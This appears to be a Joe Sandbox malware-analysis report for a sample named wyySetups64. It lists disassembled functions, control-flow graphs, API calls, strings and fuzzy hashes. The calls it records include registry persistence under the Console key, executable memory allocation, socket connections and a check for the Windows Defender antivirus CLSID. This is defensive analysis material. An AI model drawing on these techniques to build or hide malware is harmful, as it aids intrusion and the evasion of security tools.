                                                                                                                                                                                                              control_flow_graph 427 bd54c0-bd54d6 428 bd54dc-bd54e1 427->428 429 bd580e-bd5813 427->429 430 bd5707-bd575f VirtualAlloc call bdc880 call bd67ff 428->430 431 bd54e7-bd550f RegOpenKeyExW 428->431 452 bd57dd-bd57ec 430->452 453 bd5761-bd57a1 call bdc880 RegCreateKeyW 430->453 432 bd55ba-bd55bf 431->432 433 bd5515-bd5538 RegQueryValueExW 431->433 438 bd55c2-bd55c8 432->438 435 bd55ad-bd55b7 RegCloseKey 433->435 436 bd553a-bd5567 call bd67ff call bdc800 RegQueryValueExW 433->436 435->432 461 bd5569-bd55a8 VirtualAlloc call bdc880 436->461 462 bd55aa 436->462 441 bd55e8-bd55ea 438->441 442 bd55ca-bd55cd 438->442 445 bd55ed-bd55ef 441->445 443 bd55cf-bd55d7 442->443 444 bd55e4-bd55e6 442->444 443->441 448 bd55d9-bd55e2 443->448 444->445 449 bd56f8-bd5702 445->449 450 bd55f5-bd55fc 445->450 448->438 448->444 454 bd57ee-bd580b call bd721b Sleep call bd2d10 449->454 455 bd55fe-bd560b VirtualFree 450->455 456 bd5611-bd56d4 call bdc800 * 3 call bd67ff call bdc880 450->456 452->454 464 bd57ca-bd57d5 RegCloseKey call bd72bb 453->464 465 bd57a3-bd57c4 RegDeleteValueW RegSetValueExW 453->465 473 bd580d 454->473 455->456 481 bd56e6-bd56f5 call bd680a 456->481 482 bd56d6-bd56e3 456->482 461->462 462->435 472 bd57da 464->472 465->464 472->452 473->429 485 bd56e4 call bd60df 482->485 486 bd56e4 call bd31e5 482->486 485->481 486->481
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 00BD5507
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 00BD552E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD5548
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 00BD5563
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 00BD5586
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00BD55B1
                                                                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BD5605
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD5669
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD568D
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD569F
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 00BD5726
                                                                                                                                                                                                              • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 00BD5799
                                                                                                                                                                                                              • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 00BD57AC
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 00BD57C4
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 00BD57CE
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 00BD57FE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                                                                                                                              • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                                                                                                                                              • API String ID: 354323817-737951744
                                                                                                                                                                                                              • Opcode ID: cc639b8b0d133302520048f41b754afbb3adfb0eab03a821a5567828521cec4a
                                                                                                                                                                                                              • Instruction ID: 32295588429ae71fde3bc20fcf24458fd67139f7f60ef7e2f4254d52b6c94f47
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc639b8b0d133302520048f41b754afbb3adfb0eab03a821a5567828521cec4a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4591D275A40744ABD720DF60DC85FABBBF9EB84700F50459AFA099B341EBB19E40CB61
                                                                                                                                                                                                              Function 03379E50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314windowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 488 3379e50-3379e85 GdipGetImagePixelFormat 489 3379e87 488->489 490 3379e8a-3379eb1 488->490 489->490 491 3379eb3-3379ec3 490->491 492 3379ec9-3379ecf 490->492 491->492 493 3379ed1-3379ee1 492->493 494 3379eeb-3379f04 GdipGetImageHeight 492->494 493->494 495 3379f06 494->495 496 3379f09-3379f2c GdipGetImageWidth 494->496 495->496 497 3379f31-3379f4e call 3379c30 496->497 498 3379f2e 496->498 501 337a055-337a05a 497->501 502 3379f54-3379f68 497->502 498->497 503 337a2a4-337a2ba call 337f00a 501->503 504 337a0cf-337a0d7 502->504 505 3379f6e-3379f87 GdipGetImagePaletteSize 502->505 506 337a0dd-337a11a GdipBitmapLockBits 504->506 507 337a20a-337a27b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 504->507 508 3379f8c-3379f98 505->508 509 3379f89 505->509 512 337a11c-337a121 506->512 513 337a14a-337a177 506->513 514 337a281-337a283 507->514 515 3379fb2-3379fba 508->515 516 3379f9a-3379fa5 call 3379650 508->516 509->508 519 337a123 512->519 520 337a140-337a145 512->520 523 337a1bf-337a1de GdipBitmapUnlockBits 513->523 524 337a179-337a18e call 33807f2 513->524 521 337a285 514->521 522 337a2a2 514->522 517 3379fd0-3379fd5 call 3371280 515->517 518 3379fbc-3379fca call 337f673 515->518 516->515 538 3379fa7-3379fb0 call 338c660 516->538 535 3379fda-3379fe5 517->535 518->535 539 3379fcc-3379fce 518->539 527 337a12b-337a13e call 337f639 519->527 520->503 529 337a28d-337a2a0 call 337f639 521->529 522->503 523->514 532 337a1e4-337a1e7 523->532 543 337a200-337a205 call 3371280 524->543 544 337a190-337a197 524->544 527->520 547 337a125 527->547 529->522 550 337a287 529->550 532->514 541 3379fe7-3379fe9 535->541 538->541 539->541 548 337a016-337a030 GdipGetImagePalette 541->548 549 3379feb-3379fed 541->549 543->507 544->543 551 337a1f6-337a1fb call 3371280 544->551 552 337a19e-337a1bd 544->552 553 337a1ec-337a1f1 call 3371280 544->553 547->527 555 337a032-337a038 548->555 556 337a03b-337a040 548->556 559 3379fef 549->559 560 337a00c-337a011 549->560 550->529 551->543 552->523 552->524 553->551 555->556 561 337a042-337a048 556->561 562 337a04a-337a050 call 337cca0 556->562 563 3379ff7-337a00a call 337f639 559->563 560->503 561->562 564 337a05f-337a063 561->564 562->501 563->560 572 3379ff1 563->572 567 337a065 564->567 568 337a0a0-337a0c9 call 3379d80 SetDIBColorTable call 337a320 564->568 570 337a068-337a098 567->570 568->504 570->570 573 337a09a 570->573 572->563 573->568
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03379E7B
                                                                                                                                                                                                              • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03379EFC
                                                                                                                                                                                                              • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03379F24
                                                                                                                                                                                                              • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03379F7F
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 03379FC0
                                                                                                                                                                                                                • Part of subcall function 0337F673: __FF_MSGBANNER.LIBCMT ref: 0337F68C
                                                                                                                                                                                                                • Part of subcall function 0337F673: __NMSG_WRITE.LIBCMT ref: 0337F693
                                                                                                                                                                                                                • Part of subcall function 0337F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F6B8
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337A000
                                                                                                                                                                                                              • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0337A028
                                                                                                                                                                                                              • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0337A0B7
                                                                                                                                                                                                              • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0337A112
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337A134
                                                                                                                                                                                                              • _memcpy_s.LIBCMT ref: 0337A183
                                                                                                                                                                                                              • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0337A1D0
                                                                                                                                                                                                              • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03395A78,00022009,?,00000000,?,00000000), ref: 0337A22C
                                                                                                                                                                                                              • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0337A24C
                                                                                                                                                                                                              • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0337A267
                                                                                                                                                                                                              • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0337A274
                                                                                                                                                                                                              • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0337A27B
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337A296
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                                                                                                                              • String ID: &
                                                                                                                                                                                                              • API String ID: 640422297-3042966939
                                                                                                                                                                                                              • Opcode ID: e51b7b8979e9a5b836ed7937017df88989408d1c14832a13742ebb4c62638970
                                                                                                                                                                                                              • Instruction ID: 2016e1d32bec30615098088940da99ec0c12cd725e0fd7ff6413465a6e79aa21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e51b7b8979e9a5b836ed7937017df88989408d1c14832a13742ebb4c62638970
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6D131B1A006199BDB34DF55CCC0B9AB7B8FF48304F0486A9E609A7301D778AA85CF65
                                                                                                                                                                                                              Function 00BD2D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00BD2D9B
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD2DA7
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD2DAD
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 00BD2DDA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00BD2E06
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00BD2E12
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 00BD2E31
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00BD2E3D
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 00BD2E4B
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 00BD2E6D
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 00BD2E8B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                                                                                                              • String ID: 0u
                                                                                                                                                                                                              • API String ID: 640718063-3203441087
                                                                                                                                                                                                              • Opcode ID: c132cf21c56fc4ccd93a38b2377639fe123b2a695574fd7ceadfdc7dc5683821
                                                                                                                                                                                                              • Instruction ID: 8a71a5ec6a93ab2a584129ae0a323335c163ad063cebe778673fe1d755b3c2d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c132cf21c56fc4ccd93a38b2377639fe123b2a695574fd7ceadfdc7dc5683821
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 966152B1A40744AFE720DFA4DC85FAAB7F8FF48714F10451AF645AB2D0DBB0A9048B65
                                                                                                                                                                                                              Function 03372DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 03372DBB
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 03372DC7
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 03372DCD
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 03372DFA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03372E26
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03372E32
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03372E51
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03372E5D
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 03372E6B
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 03372E8D
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 03372EAB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                                                                                                              • String ID: 0u
                                                                                                                                                                                                              • API String ID: 640718063-3203441087
                                                                                                                                                                                                              • Opcode ID: f66fa9e27839b0cbb8349b12178a57748b5f384c99f62f2646e925efe9a5938e
                                                                                                                                                                                                              • Instruction ID: ef57d01e2b25428a484f8eb96bf51097348a70bc5bb64f672e6554890a6a8ecb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f66fa9e27839b0cbb8349b12178a57748b5f384c99f62f2646e925efe9a5938e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF615071A40708BFD720EFA4DC85FABB7B8FF48B10F10451AF655EB290D6B5A9048B64
                                                                                                                                                                                                              Function 0337AD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 656 337ad10-337ad2b 657 337ad84-337ad8f 656->657 658 337ad2d-337ad5b RegOpenKeyExW 656->658 661 337b845-337b84b call 337ce00 657->661 662 337ad95-337ad9c 657->662 659 337ad5d-337ad73 RegQueryValueExW 658->659 660 337ad79-337ad7e 658->660 659->660 660->657 663 337b84e-337b854 660->663 661->663 664 337afe3-337b09b call 337f707 call 3386770 call 337eff4 call 3387660 call 337f707 call 337cf20 call 337eff4 662->664 665 337adea-337adf1 662->665 714 337b162-337b189 call 337fa29 CloseHandle 664->714 715 337b0a1-337b0ee call 3387660 RegCreateKeyW 664->715 665->663 667 337adf7-337ae29 call 337f707 call 3386770 665->667 679 337ae42-337ae4e 667->679 680 337ae2b-337ae3f wsprintfW 667->680 682 337ae50 679->682 683 337ae9a-337aef1 call 337eff4 call 3387660 call 3372ba0 call 337efff * 2 679->683 680->679 686 337ae54-337ae5f 682->686 689 337ae60-337ae66 686->689 692 337ae86-337ae88 689->692 693 337ae68-337ae6b 689->693 696 337ae8b-337ae8d 692->696 694 337ae82-337ae84 693->694 695 337ae6d-337ae75 693->695 694->696 695->692 699 337ae77-337ae80 695->699 700 337aef4-337af09 696->700 701 337ae8f-337ae98 696->701 699->689 699->694 704 337af10-337af16 700->704 701->683 701->686 707 337af36-337af38 704->707 708 337af18-337af1b 704->708 713 337af3b-337af3d 707->713 711 337af32-337af34 708->711 712 337af1d-337af25 708->712 711->713 712->707 717 337af27-337af30 712->717 718 337af3f-337af41 713->718 719 337afae-337afe0 call 337fa29 CloseHandle call 337efff 713->719 733 337b0f0-337b13f call 337eff4 call 3375a30 RegDeleteValueW RegSetValueExW 715->733 734 337b14a-337b15f RegCloseKey call 337fac9 715->734 717->704 717->711 725 337af55-337af5c 718->725 726 337af43-337af4e call 337efff 718->726 731 337af70-337af74 725->731 732 337af5e-337af69 call 337fac9 725->732 726->725 736 337af76-337af7f call 337efff 731->736 737 337af85-337afa9 call 337f020 731->737 732->731 733->734 752 337b141-337b147 call 337fac9 733->752 734->714 736->737 737->683 752->734
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0337AD53
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0337AD73
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenQueryValue
                                                                                                                                                                                                              • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                                                                                                                              • API String ID: 4153817207-1338088003
                                                                                                                                                                                                              • Opcode ID: 0598fbb99e90309cd2e78769d11e9a0c3faee93000c33be40081d201dc3d3563
                                                                                                                                                                                                              • Instruction ID: e9481c149d907f95ed02dcaf7ef89d6fe00c5471ab2e6c780ad15c2897143404
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0598fbb99e90309cd2e78769d11e9a0c3faee93000c33be40081d201dc3d3563
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8C1C2B5A00300ABE720EF24DCC5F6BB3A9BF94714F080569F9459B381E779E915C7A2
                                                                                                                                                                                                              Function 03375F40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 88sleepstringsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03375F66
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03375F6E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 03375F85
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03375F90
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03375F92
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03375FB9
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 03375FC6
                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,03395328), ref: 03375FED
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 03375FF8
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 03376005
                                                                                                                                                                                                              • GetConsoleWindow.KERNEL32 ref: 0337600F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                                                                                                                              • String ID: 2024.12. 3$key$open
                                                                                                                                                                                                              • API String ID: 2922109467-4129338558
                                                                                                                                                                                                              • Opcode ID: 15a6c3dfe4fcb556d3a50f78a050bf1ee95c17ecfc1279cfb0e1f56b929fa4e8
                                                                                                                                                                                                              • Instruction ID: 7de1df75de4bc3a01dd37dc83a3497be902fd4b1baeafc8615d1eb7f9d8741a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15a6c3dfe4fcb556d3a50f78a050bf1ee95c17ecfc1279cfb0e1f56b929fa4e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E821F672904709EFE624FB60ECC6B5B739C9B84705F14081AE604DB1C1DB79E509CBA3
                                                                                                                                                                                                              Function 033762B6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 125stringregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 814 33762b6-33762bd 815 33762c0-3376363 call 3386770 wsprintfW RegOpenKeyExW 814->815 818 33763e9-33763ff 815->818 819 3376369-3376376 call 3386770 815->819 822 3376402-3376404 818->822 821 337637b-33763ba RegQueryValueExW 819->821 823 33763dc-33763e3 RegCloseKey 821->823 824 33763bc-33763da lstrcatW * 2 821->824 822->815 825 337640a-3376418 822->825 823->818 824->823 826 3376422-337642f lstrlenW 825->826 827 337641a-337641f 825->827 828 3376441-3376450 826->828 829 3376431-337643b lstrcatW 826->829 827->826 830 3376452-3376457 828->830 831 337645a-337647a call 337f00a 828->831 829->828 830->831
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 033762CE
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03376336
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0337635F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376376
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 033763B2
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A1F10,?), ref: 033763CE
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A1F10,0339535C), ref: 033763DA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 033763E3
                                                                                                                                                                                                              • lstrlenW.KERNEL32(033A1F10,?,7AA29978,00000AD4,00000000,75BF73E0), ref: 03376427
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A1F10,033953D4,?,7AA29978,00000AD4,00000000,75BF73E0), ref: 0337643B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                                                                                                                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                                                                                                              • API String ID: 1671694837-1583895642
                                                                                                                                                                                                              • Opcode ID: e6d940a2b072719d9ecb960cede27ec80e7d494532724b42ee02d4f9537d85d5
                                                                                                                                                                                                              • Instruction ID: 1aa67f67ede612b713ee5cac5a2adcc9e0c03d691f36a762003262493953658f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6d940a2b072719d9ecb960cede27ec80e7d494532724b42ee02d4f9537d85d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C4184F1A40668AFDB34DB54CC91FEEB7B8AB48705F0442C9F309A7182D6759A80CF64
                                                                                                                                                                                                              Function 03377490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03375611,0000035E,000002FA), ref: 0337749C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 033774B2
                                                                                                                                                                                                              • swprintf.LIBCMT ref: 033774EF
                                                                                                                                                                                                                • Part of subcall function 03377410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03377523), ref: 0337743D
                                                                                                                                                                                                                • Part of subcall function 03377410: GetProcAddress.KERNEL32(00000000), ref: 03377444
                                                                                                                                                                                                                • Part of subcall function 03377410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03377523), ref: 03377452
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03377547
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03377563
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(000002FA), ref: 03377586
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,03375611,0000035E,000002FA), ref: 03377598
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
